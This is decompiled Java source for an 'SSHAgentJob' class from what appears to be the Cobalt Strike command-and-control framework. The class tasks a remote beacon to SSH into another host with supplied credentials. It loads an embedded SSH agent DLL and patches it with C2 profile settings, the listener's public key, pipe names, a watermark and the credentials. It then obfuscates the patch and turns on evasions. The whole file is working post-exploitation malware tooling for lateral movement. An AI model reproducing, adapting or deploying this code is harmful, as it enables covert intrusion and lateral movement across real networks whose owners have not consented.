/*
 * Decompiled with CFR 0.152.
 */
package beacon.jobs;

import beacon.BeaconPayload;
import beacon.Job;
import beacon.Settings;
import beacon.TaskBeacon;
import beacon.jobs.PostExJobs;
import c2profile.Profile;
import common.CommonUtils;
import common.ScListener;
import common.SleevedResource;
import dns.QuickSecurity;
import pe.PostExObfuscator;

public class SSHAgentJob
extends Job {
    protected String host;
    protected String username;
    protected String password;
    protected boolean pubkey;
    protected int port;
    protected ScListener listener;

    public SSHAgentJob(TaskBeacon taskBeacon, ScListener scListener, String string, int n, String string2, String string3, boolean bl) {
        super(taskBeacon);
        this.host = string;
        this.port = n;
        this.username = string2;
        this.password = string3;
        this.pubkey = bl;
        this.listener = scListener;
    }

    @Override
    public String getDescription() {
        StringBuilder stringBuilder = new StringBuilder();
        stringBuilder.append("Tasked beacon to SSH to ").append(this.host).append(":").append(this.port).append(" as ").append(this.username);
        if (this.pubkey) {
            stringBuilder.append(" (key auth)");
        }
        if (this.isInject()) {
            stringBuilder.append(" into ").append(this.pid).append(" (").append(this.arch).append(")");
        }
        return stringBuilder.toString();
    }

    @Override
    public String getShortDescription() {
        return "SSH status";
    }

    @Override
    public String getDLLName() {
        if (this.arch.equals("x64")) {
            return "resources/sshagent.x64.dll";
        }
        return "resources/sshagent.dll";
    }

    @Override
    public String getPipeName() {
        return "PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    }

    @Override
    public String getTactic() {
        return "T1021";
    }

    @Override
    public int getCallbackType() {
        return 27;
    }

    @Override
    public int getWaitTime() {
        return 30000;
    }

    @Override
    public String getJobName() {
        return PostExJobs.SSHAGENT.getJobName();
    }

    @Override
    public void additionalObfuscations(PostExObfuscator postExObfuscator, byte[] byArray) {
        postExObfuscator.enableEvasions();
    }

    @Override
    public byte[] getDLLContent() {
        byte[] byArray = SleevedResource.readResource(this.getDLLName());
        Profile profile = this.listener.getProfile();
        String string = "\\\\%s\\pipe\\" + profile.getSSHPipeName();
        Settings settings = new Settings(8192);
        settings.addInt(4, profile.getInt(".tasks_max_size"));
        settings.addData(7, this.listener.getPublicKey(), 256);
        settings.addString(29, profile.getString(".post-ex.spawnto_x86"), 64);
        settings.addString(30, profile.getString(".post-ex.spawnto_x64"), 64);
        settings.addString(15, string, 128);
        settings.addShort(31, QuickSecurity.getCryptoScheme());
        settings.addString(21, this.host, 256);
        settings.addShort(22, this.port);
        settings.addString(23, this.username, 128);
        settings.addShort(55, this.isInject() ? 1 : 0);
        settings.addInt(37, profile.getInt(".watermark"));
        settings.addString(36, profile.getString(".watermarkHash"), 32);
        if (this.pubkey) {
            settings.addString(25, this.password, 6144);
        } else {
            settings.addString(24, this.password, 128);
        }
        settings.addString(56, "SSH-2.0-" + profile.getString(".ssh_banner"), 128);
        BeaconPayload.setupPivotFrames(profile, settings);
        byte[] byArray2 = settings.toPatch();
        byArray2 = BeaconPayload.beacon_obfuscate(byArray2);
        String string2 = CommonUtils.bString(byArray);
        int n = string2.indexOf("AAAABBBBCCCCDDDDEEEEFFFF");
        string2 = CommonUtils.replaceAt(string2, CommonUtils.bString(byArray2), n);
        return CommonUtils.toBytes(string2);
    }
}

